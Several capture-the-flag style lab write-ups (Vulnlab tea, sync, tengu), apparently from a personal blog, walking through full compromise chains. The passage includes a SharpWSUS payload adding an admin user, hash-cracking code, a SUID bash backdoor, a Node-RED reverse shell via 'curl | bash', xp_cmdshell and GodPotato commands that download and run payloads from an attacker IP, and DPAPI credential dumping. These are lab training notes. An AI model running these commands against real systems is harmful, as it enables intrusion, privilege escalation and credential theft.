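    """Return the separate commands cmd.exe would execute for one line."""
    commands, cur, quoted, i = [], [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            quoted = not quoted
            cur.append(ch)
        elif not quoted and ch == "^" and i + 1 < len(line):
            i += 1                          # caret: next character is literal
            cur.append(line[i])
        elif not quoted and line.startswith(("&&", "||"), i):
            commands.append("".join(cur).strip()); cur = []
            i += 1                          # second char of the operator
        elif not quoted and ch in "&|":
            commands.append("".join(cur).strip()); cur = []
        else:
            cur.append(ch)
        i += 1
    commands.append("".join(cur).strip())
    return [c for c in commands if c]


def crt_argv(command):
    """Split one command into argv the way the MS C runtime does."""
    args, cur, quoted, started, i, n = [], [], False, False, 0, len(command)
    while i < n:
        ch = command[i]
        if ch == "\\":
            j = i
            while j < n and command[j] == "\\":
                j += 1
            nbs = j - i
            if j < n and command[j] == '"':
                cur.append("\\" * (nbs // 2))
                if nbs % 2:                 # odd: the quote is a literal char
                    cur.append('"')
                    j += 1                  # even: the quote toggles, below
                started, i = True, j
                continue
            cur.append("\\" * nbs)          # backslashes not before a quote
            started, i = True, j
            continue
        if ch == '"':
            quoted, started = not quoted, True
        elif ch in " \t" and not quoted:
            if started:
                args.append("".join(cur)); cur, started = [], False
        else:
            cur.append(ch); started = True
        i += 1
    if started:
        args.append("".join(cur))
    return args


def simulate(line):
    """argv of every command cmd.exe would run for the given line."""
    return [crt_argv(c) for c in cmd_split(line)]


# The line from the page: cmd.exe cuts it at the unquoted '&&'.
BROKEN = (r'sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" '
          r'/args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add '
          r'&& net localgroup administrators puck /add \"" /title:"Great UpdateC21"')

# Assumed fix (not from the page): keep && literal for cmd.exe with carets and
# let the CRT turn \" into the inner quotes psexec needs.
FIXED = (r'sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" '
         r'/args:"-accepteula -s -d cmd.exe /c \"net user puck Password123! /add '
         r'^&^& net localgroup administrators puck /add\"" /title:"Great UpdateC21"')

if __name__ == "__main__":
    for label, line in (("BROKEN", BROKEN), ("FIXED", FIXED)):
        for argv in simulate(line):
            print(label, argv)
```

The model reproduces the page's symptom exactly: the BROKEN line becomes two commands, the first with /args truncated to "... /c \net", the second starting with net localgroup and executed on the machine where SharpWSUS was launched. Before pushing an update it is worth running the intended command through a model like this, or simply echoing the argument string from a test payload, because a WSUS update that carries the wrong arguments still gets installed on the target.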



C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update
C:\WSUS-Updates\WsusContent

Targeting dc.tea.vl
TargetComputer, ComputerID, TargetID
------------------------------------
dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1
Group Exists = False
Group Created: Group1
Added Computer To Group
Approved Update

[*] Approve complete


C:\_install>

 

Once the DC has installed the approved update, the account it created exists on the DC. A domain controller has no local SAM, so net user /add there creates a domain account and net localgroup administrators /add puts it in the domain's built-in Administrators group; the new user is effectively a domain admin:

┌──(puck㉿kali)-[~/vulnlab]
└─$ netexec smb dc.tea.vl -u puckie -p 'Start123!'
SMB         10.10.145.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.145.21    445    DC               [+] tea.vl\puckie:Start123! (Pwn3d!)

.

Finally, RDP to the DC:

xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389

.

Dump the domain hashes with secretsdump:

impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt

 

This was super fun.

.

 

vulnlab-sync

vulnlab sync

An easy-rated Linux box.

nmap scan

# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172
Nmap scan report for 10.10.93.172
Host is up (0.023s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA)
|_  256 18fd36c6a505b196147283f862d53821 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds

rsync enum

rsync -av --list-only rsync://10.10.93.172/

The httpd module is readable without authentication, so we pull the website's source with rsync:

rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared

.

In the site source we find that the stored hash is md5 over three fields joined by '|': $secure|$username|$password. The fixed prefix $secure|$username| therefore acts as a per-user salt. Written in hashcat's hash:salt form, the entry for triss is:

a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|

hashcat mode 20, md5($salt.$pass), cracks it:

hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt
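The hashing scheme described above, as an added example that is not part of the original writeup: it reproduces the application's md5("$secure|$username|$password") construction, emits the hashcat -m 20 line (hash:salt, with the fixed prefix as the salt) and cracks it offline against a small constructed wordlist. The salt and username are the ones on the page; the password and wordlist are made up for the demonstration.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# Values from the page: the per-user "secure" token and the username.
SECURE = "6c4972f3717a5e881e282ad3105de01e"
USERNAME = "triss"


def app_hash(secure: str, username: str, password: str) -> str:
    """Reproduce the web app's scheme: md5("$secure|$username|$password").
    Everything before the password is fixed per user, i.e. a salt."""
    return hashlib.md5(f"{secure}|{username}|{password}".encode()).hexdigest()


def hashcat_line(digest: str, secure: str, username: str) -> str:
    """hashcat -m 20 is md5($salt.$pass) and expects 'hash:salt'; the salt is
    the prefix that precedes the password, including both '|' separators."""
    return f"{digest}:{secure}|{username}|"


def parse_hashcat_line(line: str) -> Tuple[str, str]:
    digest, salt = line.strip().split(":", 1)
    return digest, salt


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline equivalent of the hashcat run: md5(salt + candidate) == hash."""
    digest, salt = parse_hashcat_line(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if hashlib.md5((salt + candidate).encode()).hexdigest() == digest:
            return candidate
    return None


if __name__ == "__main__":
    demo_password = "example-password"        # constructed, not the real one
    line = hashcat_line(app_hash(SECURE, USERNAME, demo_password), SECURE, USERNAME)
    print(line)
    print(crack(line, ["123456", "password", demo_password, "letmein"]))
```

Mode 20 puts the salt before the password; mode 10 (md5($pass.$salt)) would never match here because the application appends the password last. The same pair of functions is a cheap sanity check before a long hashcat run: if app_hash with a test account you control does not reproduce the stored hash, the scheme has been misread.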

With the cracked password we log in over FTP as triss, create a .ssh directory in the home directory and upload our public key as authorized_keys:

┌──(puck㉿kali)-[~/vulnlab/sync]
└─$ ftp 10.10.93.172      
Connected to 10.10.93.172.
220 (vsFTPd 3.0.5)
Name (10.10.93.172:puck): triss
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41121|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||6569|)
150 Ok to send data.
100% |************************************************************************|    91      612.87 KiB/s    00:00 ETA
226 Transfer complete.
91 bytes sent in 00:00 (2.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||65353|)
150 Here comes the directory listing.
-rw-------    1 1003     1003           91 Aug 19 09:11 authorized_keys
226 Directory send OK.

.

ssh  -i ed_25519 triss@10.10.93.172

In /etc/passwd we find another user, jennifer; su jennifer works with the same password as triss.

In /backup there are zip archives owned by root. Running pspy shows what creates them:

timeout 60s ./pspy64

We transfer the zip to our box and extract the passwd and shadow copies it contains:

wget http://10.8.2.138:8000/1698154321.zip

unshadow

$ unshadow passwd shadow > unshadow

crack it

john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow

Cracking yields the password of the user sa, and sa has write permission on /usr/local/bin/backup.sh, the script that produces the root-owned backups. We append a line that sets the SUID bit on bash:

echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash

Wait for the next run of the backup job, then spawn a privileged bash:

/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#

that’s all

vulnlab-tengu

vulnlab-tengu

A medium-rated chain: an Ubuntu VM (nodered), sql.tengu.vl and dc.tengu.vl, all domain-joined.

noderedsh.py -> extract the machine keys from /etc/krb5.keytab -> read the gMSA password -> constrained delegation -> mssqlclient.py as an impersonated SQL admin -> xp_cmdshell -> GodPotato -> domain admin password with SharpDPAPI

node-red exploit [initial access]

Node-RED is listening on port 1880 without authentication. With noderedsh.py we create a flow that executes commands on the host and use it to launch a reverse shell:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 noderedsh.py http://10.10.139.247:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
nodered_svc
> curl http://10.8.2.138/s.sh | bash

.

python3 -m http.server 80          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ nc -nlvp 9001       
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442
sh: 0: can't access tty; job control turned off
$ whoami
nodered_svc
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm
export TERM=xterm
nodered_svc@nodered:/opt/nodered/.node-red$ 
zsh: suspended  rlwrap nc -nlvp 443

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
nodered_svc@nodered:/opt/nodered/.node-red$ 
nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel
nodered_svc@nodered:/tmp$ chmod +x chisel
nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ chisel server -p 8000 --reverse 
2024/08/14 09:18:49 server: Reverse tunnelling enabled
2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc=
2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000
2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

With the MSSQL login nodered_connector (the step that recovers its password is not shown on this page), we check the SQL server through the SOCKS tunnel:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted>25' --local-auth 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:445  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [+] nodered_connector:DreamPuppy<redacted>25 

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25'  
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.139.246:1433  ...  OK
1> show databases;
2> use prod;
3> go
Msg 911, Level 16, State 1
Server 'SQL', Line 2
Database 'prod' does not exist. Make sure that the name is entered correctly.
1> select table_name from systable
2> go
Msg 208, Level 16, State 1
Server 'SQL', Line 1
Invalid object name 'systable'.
1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES;
2> go -m vert
TABLE_CATALOG: Dev
TABLE_SCHEMA:  dbo
TABLE_NAME:    Task
TABLE_TYPE:    BASE TABLE
 
(1 row affected)
1> 

...
1> SELECT name FROM master.dbo.sysdatabases;
2> go -m vert
name: master
 
name: tempdb
 
name: model
 
name: msdb
 
name: Demo
 
name: Dev
 
(6 rows affected)
1> use Demo;
2> go
1> select * from users;
2> go -m vert
ID:       NULL
Username: t2_m.winters
Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147
 
(1 row affected)
1> 

.

The hash is 64 hex characters, consistent with unsalted SHA-256; crackstation.net resolves it to Tengu123.

Checking credentials

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123'         
SMB         dc.tengu.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.tengu.vl:389  ...  OK
LDAP        dc.tengu.nl     389    DC               [+] tengu.vl\t2_m.winters:Tengu123 

 

Getting krb5.keytab

Because the Node-RED host is domain-joined, /etc/krb5.keytab holds the keys of its machine account NODERED$. The RC4-HMAC key in a keytab is exactly the account's NT hash, so we copy the file to our box and extract it with https://github.com/sosdave/KeyTabExtract:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : TENGU.VL
    SERVICE PRINCIPAL : NODERED$/
    NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
    AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
    AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
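As an added example (our own code, not KeyTabExtract's), the following parses the MIT keytab format the tool reads. It builds a sample keytab in memory from the NODERED$ key material shown above (timestamp and kvno are made up), reads it back and reports the RC4-HMAC key as the NT hash. Field layout follows the MIT keytab format, version 0x0502, all integers big-endian.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Added example, not KeyTabExtract's code. Kerberos enctype numbers:
ENCTYPES = {23: "RC4-HMAC (key = NT hash)",
            17: "AES128-CTS-HMAC-SHA1-96",
            18: "AES256-CTS-HMAC-SHA1-96"}


@dataclass
class KeytabEntry:
    principal: str      # components joined by '/', then @REALM
    kvno: int
    enctype: int
    key: bytes


def _counted(data: bytes) -> bytes:
    """counted_octet_string: uint16 length followed by the bytes."""
    return struct.pack(">H", len(data)) + data


def build_keytab(realm: str, components: List[str], kvno: int,
                 keys: List[Tuple[int, bytes]], name_type: int = 1,
                 timestamp: int = 0) -> bytes:
    """Serialise one keytab entry per (enctype, key); used here only to
    construct a sample file in memory."""
    out = b"\x05\x02"                                   # file format version
    for enctype, key in keys:
        body = struct.pack(">H", len(components)) + _counted(realm.encode())
        for comp in components:
            body += _counted(comp.encode())
        body += struct.pack(">IIB", name_type, timestamp, kvno & 0xFF)
        body += struct.pack(">H", enctype) + _counted(key)   # keyblock
        body += struct.pack(">I", kvno)                       # 32-bit kvno
        out += struct.pack(">i", len(body)) + body            # size excludes itself
    return out


def parse_keytab(blob: bytes) -> List[KeytabEntry]:
    version = struct.unpack(">H", blob[:2])[0]
    if version != 0x0502:
        raise ValueError(f"unsupported keytab version {version:#06x}")
    entries, pos = [], 2
    while pos + 4 <= len(blob):
        size = struct.unpack(">i", blob[pos:pos + 4])[0]
        pos += 4
        if size < 0:                                    # deleted slot
            pos += -size
            continue
        entry, pos = blob[pos:pos + size], pos + size
        p = 0
        ncomp = struct.unpack(">H", entry[p:p + 2])[0]; p += 2
        parts = []
        for _ in range(ncomp + 1):                      # realm, then components
            ln = struct.unpack(">H", entry[p:p + 2])[0]; p += 2
            parts.append(entry[p:p + ln].decode()); p += ln
        realm, comps = parts[0], parts[1:]
        _name_type, _ts, vno8 = struct.unpack(">IIB", entry[p:p + 9]); p += 9
        enctype, klen = struct.unpack(">HH", entry[p:p + 4]); p += 4
        key = entry[p:p + klen]; p += klen
        # the 32-bit kvno is only present when at least 4 bytes remain
        kvno = struct.unpack(">I", entry[p:p + 4])[0] if len(entry) - p >= 4 else vno8
        entries.append(KeytabEntry("/".join(comps) + "@" + realm, kvno, enctype, key))
    return entries


def nt_hash_for(entries: List[KeytabEntry], principal: str) -> Optional[str]:
    """RC4-HMAC keys are the NT hash, which is what pass-the-hash tooling wants."""
    for e in entries:
        if e.principal == principal and e.enctype == 23:
            return e.key.hex()
    return None


# Sample keytab constructed from the NODERED$ keys shown on the page.
SAMPLE_KEYTAB = build_keytab("TENGU.VL", ["NODERED$"], 2, [
    (23, bytes.fromhex("d4210ee2db0c03aa3611c9ef8a4dbf49")),
    (18, bytes.fromhex("4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096")),
    (17, bytes.fromhex("3e04b61b939f61018d2c27d4dc0b385f")),
])

if __name__ == "__main__":
    entries = parse_keytab(SAMPLE_KEYTAB)
    for e in entries:
        print(f"{e.principal} kvno={e.kvno} {ENCTYPES.get(e.enctype, e.enctype)}: {e.key.hex()}")
    print("NT hash:", nt_hash_for(entries, "NODERED$@TENGU.VL"))
```

Pointing parse_keytab at a real /etc/krb5.keytab (open it in binary mode) lists every principal and key it contains; a host keytab usually carries host/ and the machine-account principal for several enctypes. Only the enctype 23 key doubles as the NT hash; the AES keys can still be used directly with tools that accept -aesKey.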

 

.

 

proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip

In BloodHound we find that the machine account NODERED$ has ReadGMSAPassword over gMSA01$.

With the NT hash from the keytab, netexec retrieves the gMSA password (as its NT hash):

──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM: 

 

findDelegation shows that gMSA01$ is configured for constrained delegation with protocol transition to the MSSQLSvc SPNs of SQL, so with its hash we can obtain a service ticket for SQL on behalf of any user that is not marked sensitive or in Protected Users:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

AccountName  AccountType                          DelegationType                      DelegationRightsTo         
-----------  -----------------------------------  ----------------------------------  --------------------------
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/SQL:1433          
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl:1433 
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl      
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql               

In BloodHound we also find a SQL_Admins group with two members. We impersonate one of them, t1_m.winters (note the different tier prefix from the t2_m.winters account we cracked), when requesting the ticket.

getting the ticket

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Impersonating t1_m.winters
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
                                                                                                                             

.

export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters  dbo@master)> 

.

SQL (TENGU\t1_m.winters  dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ rlwrap nc -nlvp 443                                 
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp> 

.

GodPotato on SQL: the xp_cmdshell context has SeImpersonatePrivilege enabled (see whoami /priv above), so a potato-style DCOM/RPC coercion gets us a SYSTEM token.

PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
[*] CombaseModule: 0x140723188531200
[*] DispatchTable: 0x140723191118152
[*] UseProtseqFunction: 0x140723190413536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435
[*] DCOM obj OXID: 0x3beb0139e85dbe21
[*] DCOM obj OID: 0x3a821b5f15430353
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 908 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3888

Catch the shell as NT AUTHORITY\SYSTEM and add ourselves as local admin on SQL.

But first, the creds of the domain admin TENGU\T0_c.fowler: as SYSTEM we run SharpDPAPI's machinetriage, which pulls the DPAPI_SYSTEM LSA secret, decrypts the machine master keys with it and then the credential blobs under the system profile; one of them is a Task Scheduler credential stored for T0_c.fowler.

Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.

PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe
PS C:\temp> ./sharp.exe machinetriage /showall

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.11.3                               


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Secret  : DPAPI_SYSTEM
[*]    full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544
[*]    m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544


[*] SYSTEM master key cache:

{474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5
{7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7
{1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B
{236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86


[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD

    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
